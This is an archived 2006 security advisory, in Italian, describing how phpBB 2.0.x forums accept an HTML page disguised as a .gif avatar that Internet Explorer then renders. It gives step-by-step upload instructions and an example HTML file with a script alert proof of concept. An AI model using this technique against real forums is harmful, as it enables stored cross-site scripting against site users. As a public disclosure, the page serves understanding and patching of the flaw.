Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11955
HistoryMar 27, 2006 - 12:00 a.m.

phpBB v 2.0.X upload html .gif ( "not 2.0.19" )

2006-03-2700:00:00
vulners.com
6

       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'       

=> Autore: SpiderZ
=> phpBB v 2.0.X upload html .gif ( "not 2.0.19" )
=> Sito: www.spiderz.tk



Registrati al seguente forum


entra con i tuoi dati


vai su "Profilo"
su "Carica avatar da PC:"


prepara la tua pagina "exploit"


salva la tua pag htm in .gif .jpg .png ( usando un semplice editor di testo )


adesso inserisci la tua .gif ( html )
usando il browser ( firefox )


una volta uppata la gif aprite il sito usando ( Internet explorer )
andate su: "Profilo"


prelevate il link della vosta gif uppata precedentemente
es: http://www.sito…org/phpBB2/images/avatars/1603115041440ff75450e9e.gif
usando ( internet explorer ) aprite il link della singola img
e vedrete una pag html invece di un file gif

Esempio HTML:


<style type="text/css">
<!–
body,td,th {
color: #00FF00;
}
body {
background-color: #000000;
}
.style1 {
font-family: "Courier New", Courier, monospace;
font-weight: bold;
font-size: 14px;
}
.style2 {color: #999999}
.style3 {font-family: "Courier New", Courier, monospace; font-weight: bold; font-size: 14px; color: #CCFF00; }
–>
</style>
<div align="center">
<p class="style3"><img src="http://img48.imageshack.us/img48/4090/whosonlinegif0jl.png&quot; width="142" height="220"></p>
<p class="style1"><span class="style2">ITA</span>: qui potrete inserire il vostro exploit </p>
<p class="style1"><span class="style2">ENG</span>: here you will be able to insert yours exploit</p>
<p class="style1"><span class="style2">FRE</span>: ici vous pourrez ins&eacute;rer le v&ocirc;tre exploit </p>
</div>
<script>alert("=> Exploit by SpiderZ <=")</script>


salva la pagina .GIF

www.spiderz.tk [2006]